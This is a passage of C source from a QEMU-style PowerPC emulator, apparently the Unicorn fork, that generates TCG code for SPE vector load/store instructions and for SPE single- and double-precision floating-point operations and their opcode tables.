gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, 16); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evstdd(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); gen_load_gpr64(tcg_ctx, t0, rS(ctx->opcode)); gen_qemu_st64_i64(ctx, t0, addr); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_op_evstdw(DisasContext *ctx, TCGv addr) { gen_qemu_st32(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 4); gen_qemu_st32(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstdh(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gprh[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); tcg_temp_free(tcg_ctx, t0); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstwhe(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gprh[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); gen_addr_add(ctx, addr, addr, 2); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], 16); gen_qemu_st16(ctx, t0, addr); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evstwho(DisasContext *ctx, TCGv addr) { gen_qemu_st16(ctx, cpu_gprh[rS(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_st16(ctx, cpu_gpr[rS(ctx->opcode)], addr); } static inline void gen_op_evstwwe(DisasContext *ctx, TCGv addr) { gen_qemu_st32(ctx, cpu_gprh[rS(ctx->opcode)], addr); } static inline void gen_op_evstwwo(DisasContext *ctx, TCGv addr) { 
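/* evstwwo stores only the low ("odd") 32-bit word of rS, from cpu_gpr; its counterpart evstwwe above stores the high ("even") word from cpu_gprh. */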
gen_qemu_st32(ctx, cpu_gpr[rS(ctx->opcode)], addr); } #define GEN_SPEOP_LDST(name, opc2, sh) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ t0 = tcg_temp_new(tcg_ctx); \ if (Rc(ctx->opcode)) { \ gen_addr_spe_imm_index(ctx, t0, sh); \ } else { \ gen_addr_reg_index(ctx, t0); \ } \ gen_op_##name(ctx, t0); \ tcg_temp_free(tcg_ctx, t0); \ } GEN_SPEOP_LDST(evldd, 0x00, 3); GEN_SPEOP_LDST(evldw, 0x01, 3); GEN_SPEOP_LDST(evldh, 0x02, 3); GEN_SPEOP_LDST(evlhhesplat, 0x04, 1); GEN_SPEOP_LDST(evlhhousplat, 0x06, 1); GEN_SPEOP_LDST(evlhhossplat, 0x07, 1); GEN_SPEOP_LDST(evlwhe, 0x08, 2); GEN_SPEOP_LDST(evlwhou, 0x0A, 2); GEN_SPEOP_LDST(evlwhos, 0x0B, 2); GEN_SPEOP_LDST(evlwwsplat, 0x0C, 2); GEN_SPEOP_LDST(evlwhsplat, 0x0E, 2); GEN_SPEOP_LDST(evstdd, 0x10, 3); GEN_SPEOP_LDST(evstdw, 0x11, 3); GEN_SPEOP_LDST(evstdh, 0x12, 3); GEN_SPEOP_LDST(evstwhe, 0x18, 2); GEN_SPEOP_LDST(evstwho, 0x1A, 2); GEN_SPEOP_LDST(evstwwe, 0x1C, 2); GEN_SPEOP_LDST(evstwwo, 0x1E, 2); /* Multiply and add - TODO */ #if 0 GEN_SPE(speundef, evmhessf, 0x01, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE);// GEN_SPE(speundef, evmhossf, 0x03, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumi, evmhesmi, 0x04, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmf, 0x05, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumi, evmhosmi, 0x06, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmf, 0x07, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfa, 0x11, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfa, 0x13, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumia, evmhesmia, 0x14, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfa, 0x15, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumia, evmhosmia, 0x16, 0x10, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfa, 0x17, 0x10, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhssf, 0x03, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlumi, speundef, 0x04, 0x11, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evmwhumi, evmwhsmi, 0x06, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhsmf, 0x07, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssf, 0x09, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmf, 0x0D, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhssfa, 0x13, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlumia, speundef, 0x14, 0x11, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evmwhumia, evmwhsmia, 0x16, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwhsmfa, 0x17, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfa, 0x19, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfa, 0x1D, 0x11, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evadduiaaw, evaddsiaaw, 0x00, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evsubfusiaaw, evsubfssiaaw, 0x01, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evaddumiaaw, evaddsmiaaw, 0x04, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evsubfumiaaw, evsubfsmiaaw, 0x05, 0x13, 0x0000F800, 0x0000F800, PPC_SPE); GEN_SPE(evdivws, evdivwu, 0x06, 0x13, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmheusiaaw, evmhessiaaw, 0x00, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfaaw, 0x01, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhousiaaw, 
evmhossiaaw, 0x02, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfaaw, 0x03, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumiaaw, evmhesmiaaw, 0x04, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfaaw, 0x05, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumiaaw, evmhosmiaaw, 0x06, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfaaw, 0x07, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhegumiaa, evmhegsmiaa, 0x14, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhegsmfaa, 0x15, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhogumiaa, evmhogsmiaa, 0x16, 0x14, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhogsmfaa, 0x17, 0x14, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlusiaaw, evmwlssiaaw, 0x00, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwlumiaaw, evmwlsmiaaw, 0x04, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfaa, 0x09, 0x15, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfaa, 0x0D, 0x15, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheusianw, evmhessianw, 0x00, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhessfanw, 0x01, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhousianw, evmhossianw, 0x02, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhossfanw, 0x03, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmheumianw, evmhesmianw, 0x04, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhesmfanw, 0x05, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhoumianw, evmhosmianw, 0x06, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhosmfanw, 0x07, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhegumian, evmhegsmian, 0x14, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhegsmfan, 0x15, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmhigumian, evmhigsmian, 0x16, 0x16, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmhogsmfan, 0x17, 0x16, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwlusianw, evmwlssianw, 0x00, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwlumianw, evmwlsmianw, 0x04, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwssfan, 0x09, 0x17, 0xFFFFFFFF, 0x00000000, PPC_SPE); GEN_SPE(evmwumian, evmwsmian, 0x0C, 0x17, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evmwsmfan, 0x0D, 0x17, 0xFFFFFFFF, 0x00000000, PPC_SPE); #endif /*** SPE floating-point extension ***/ #define GEN_SPEFPUOP_CONV_32_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ } #define GEN_SPEFPUOP_CONV_32_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t1, tcg_ctx->cpu_env, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_CONV_64_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); \ 
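    /* 64 <- 32: truncate rB to 32 bits, run the helper, then write the 64-bit result back through gen_store_gpr64(). */ \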
tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t1); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_CONV_64_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ } #define GEN_SPEFPUOP_ARITH2_32_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_ARITH2_64_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rA(ctx->opcode)); \ gen_load_gpr64(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1); \ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_COMP_32(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tcg_ctx->cpu_env, t0, t1); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } #define GEN_SPEFPUOP_COMP_64(name) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i64(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ gen_load_gpr64(tcg_ctx, t0, rA(ctx->opcode)); \ gen_load_gpr64(tcg_ctx, t1, rB(ctx->opcode)); \ gen_helper_##name(tcg_ctx, cpu_crf[crfD(ctx->opcode)], tcg_ctx->cpu_env, t0, t1); \ tcg_temp_free_i64(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } /* Single precision floating-point vectors operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_64_64(evfsadd); GEN_SPEFPUOP_ARITH2_64_64(evfssub); GEN_SPEFPUOP_ARITH2_64_64(evfsmul); GEN_SPEFPUOP_ARITH2_64_64(evfsdiv); static inline void gen_evfsabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], ~0x80000000); tcg_gen_andi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], 
cpu_gprh[rA(ctx->opcode)], ~0x80000000); } static inline void gen_evfsnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); tcg_gen_ori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } static inline void gen_evfsneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); tcg_gen_xori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_64_64(evfscfui); GEN_SPEFPUOP_CONV_64_64(evfscfsi); GEN_SPEFPUOP_CONV_64_64(evfscfuf); GEN_SPEFPUOP_CONV_64_64(evfscfsf); GEN_SPEFPUOP_CONV_64_64(evfsctui); GEN_SPEFPUOP_CONV_64_64(evfsctsi); GEN_SPEFPUOP_CONV_64_64(evfsctuf); GEN_SPEFPUOP_CONV_64_64(evfsctsf); GEN_SPEFPUOP_CONV_64_64(evfsctuiz); GEN_SPEFPUOP_CONV_64_64(evfsctsiz); /* Comparison */ GEN_SPEFPUOP_COMP_64(evfscmpgt); GEN_SPEFPUOP_COMP_64(evfscmplt); GEN_SPEFPUOP_COMP_64(evfscmpeq); GEN_SPEFPUOP_COMP_64(evfststgt); GEN_SPEFPUOP_COMP_64(evfststlt); GEN_SPEFPUOP_COMP_64(evfststeq); /* Opcodes definitions */ GEN_SPE(evfsadd, evfssub, 0x00, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(evfsabs, evfsnabs, 0x02, 0x0A, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE); // GEN_SPE(evfsneg, speundef, 0x03, 0x0A, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfsmul, evfsdiv, 0x04, 0x0A, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(evfscmpgt, evfscmplt, 0x06, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(evfscmpeq, speundef, 0x07, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfscfui, evfscfsi, 0x08, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfscfuf, evfscfsf, 0x09, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctui, evfsctsi, 0x0A, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctuf, evfsctsf, 0x0B, 0x0A, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(evfsctuiz, speundef, 0x0C, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfsctsiz, speundef, 0x0D, 0x0A, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(evfststgt, evfststlt, 0x0E, 0x0A, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(evfststeq, speundef, 0x0F, 0x0A, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // /* Single precision floating-point operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_32_32(efsadd); GEN_SPEFPUOP_ARITH2_32_32(efssub); GEN_SPEFPUOP_ARITH2_32_32(efsmul); GEN_SPEFPUOP_ARITH2_32_32(efsdiv); static inline void gen_efsabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], (target_long)~0x80000000LL); } static inline void gen_efsnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_ori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], 0x80000000); } static inline void gen_efsneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_xori_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 
cpu_gpr[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_32_32(efscfui); GEN_SPEFPUOP_CONV_32_32(efscfsi); GEN_SPEFPUOP_CONV_32_32(efscfuf); GEN_SPEFPUOP_CONV_32_32(efscfsf); GEN_SPEFPUOP_CONV_32_32(efsctui); GEN_SPEFPUOP_CONV_32_32(efsctsi); GEN_SPEFPUOP_CONV_32_32(efsctuf); GEN_SPEFPUOP_CONV_32_32(efsctsf); GEN_SPEFPUOP_CONV_32_32(efsctuiz); GEN_SPEFPUOP_CONV_32_32(efsctsiz); GEN_SPEFPUOP_CONV_32_64(efscfd); /* Comparison */ GEN_SPEFPUOP_COMP_32(efscmpgt); GEN_SPEFPUOP_COMP_32(efscmplt); GEN_SPEFPUOP_COMP_32(efscmpeq); GEN_SPEFPUOP_COMP_32(efststgt); GEN_SPEFPUOP_COMP_32(efststlt); GEN_SPEFPUOP_COMP_32(efststeq); /* Opcodes definitions */ GEN_SPE(efsadd, efssub, 0x00, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(efsabs, efsnabs, 0x02, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_SINGLE); // GEN_SPE(efsneg, speundef, 0x03, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efsmul, efsdiv, 0x04, 0x0B, 0x00000000, 0x00000000, PPC_SPE_SINGLE); // GEN_SPE(efscmpgt, efscmplt, 0x06, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(efscmpeq, efscfd, 0x07, 0x0B, 0x00600000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efscfui, efscfsi, 0x08, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efscfuf, efscfsf, 0x09, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctui, efsctsi, 0x0A, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctuf, efsctsf, 0x0B, 0x0B, 0x00180000, 0x00180000, PPC_SPE_SINGLE); // GEN_SPE(efsctuiz, speundef, 0x0C, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efsctsiz, speundef, 0x0D, 0x0B, 0x00180000, 0xFFFFFFFF, PPC_SPE_SINGLE); // GEN_SPE(efststgt, efststlt, 0x0E, 0x0B, 0x00600000, 0x00600000, PPC_SPE_SINGLE); // GEN_SPE(efststeq, speundef, 0x0F, 0x0B, 0x00600000, 0xFFFFFFFF, PPC_SPE_SINGLE); // /* Double precision floating-point operations */ /* Arithmetic */ GEN_SPEFPUOP_ARITH2_64_64(efdadd); GEN_SPEFPUOP_ARITH2_64_64(efdsub); GEN_SPEFPUOP_ARITH2_64_64(efdmul); GEN_SPEFPUOP_ARITH2_64_64(efddiv); static inline void gen_efdabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_andi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], ~0x80000000); } static inline void gen_efdnabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_ori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } static inline void gen_efdneg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xori_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)], 0x80000000); } /* Conversion */ GEN_SPEFPUOP_CONV_64_32(efdcfui); GEN_SPEFPUOP_CONV_64_32(efdcfsi); GEN_SPEFPUOP_CONV_64_32(efdcfuf); GEN_SPEFPUOP_CONV_64_32(efdcfsf); GEN_SPEFPUOP_CONV_32_64(efdctui); GEN_SPEFPUOP_CONV_32_64(efdctsi); GEN_SPEFPUOP_CONV_32_64(efdctuf); GEN_SPEFPUOP_CONV_32_64(efdctsf); GEN_SPEFPUOP_CONV_32_64(efdctuiz); GEN_SPEFPUOP_CONV_32_64(efdctsiz); GEN_SPEFPUOP_CONV_64_32(efdcfs); GEN_SPEFPUOP_CONV_64_64(efdcfuid); GEN_SPEFPUOP_CONV_64_64(efdcfsid); 
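/*
 * Note: the efdcf{u,s}id / efdct{u,s}idz pairs below convert between doubles
 * and 64-bit integers; the trailing 'z' means the conversion rounds toward
 * zero.
 */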
GEN_SPEFPUOP_CONV_64_64(efdctuidz);
GEN_SPEFPUOP_CONV_64_64(efdctsidz);

/* Comparison */
GEN_SPEFPUOP_COMP_64(efdcmpgt);
GEN_SPEFPUOP_COMP_64(efdcmplt);
GEN_SPEFPUOP_COMP_64(efdcmpeq);
GEN_SPEFPUOP_COMP_64(efdtstgt);
GEN_SPEFPUOP_COMP_64(efdtstlt);
GEN_SPEFPUOP_COMP_64(efdtsteq);

/* Opcodes definitions */
GEN_SPE(efdadd, efdsub, 0x10, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE); //
GEN_SPE(efdcfuid, efdcfsid, 0x11, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdabs, efdnabs, 0x12, 0x0B, 0x0000F800, 0x0000F800, PPC_SPE_DOUBLE); //
GEN_SPE(efdneg, speundef, 0x13, 0x0B, 0x0000F800, 0xFFFFFFFF, PPC_SPE_DOUBLE); //
GEN_SPE(efdmul, efddiv, 0x14, 0x0B, 0x00000000, 0x00000000, PPC_SPE_DOUBLE); //
GEN_SPE(efdctuidz, efdctsidz, 0x15, 0x0B, 0x00180000, 0x00180000, PPC_SPE_DOUBLE); //
GEN_SPE(efdcmpgt, efdcmplt, 0x16, 0x0B, 0x00600000, 0x00600000, PPC_SPE_DOUBLE); //
GEN_SPE(efdcmpeq, efdcfs, 0x17, 0x0B, 0x00600000, 0x00180000, PPC_SPE_DOUBLE); //
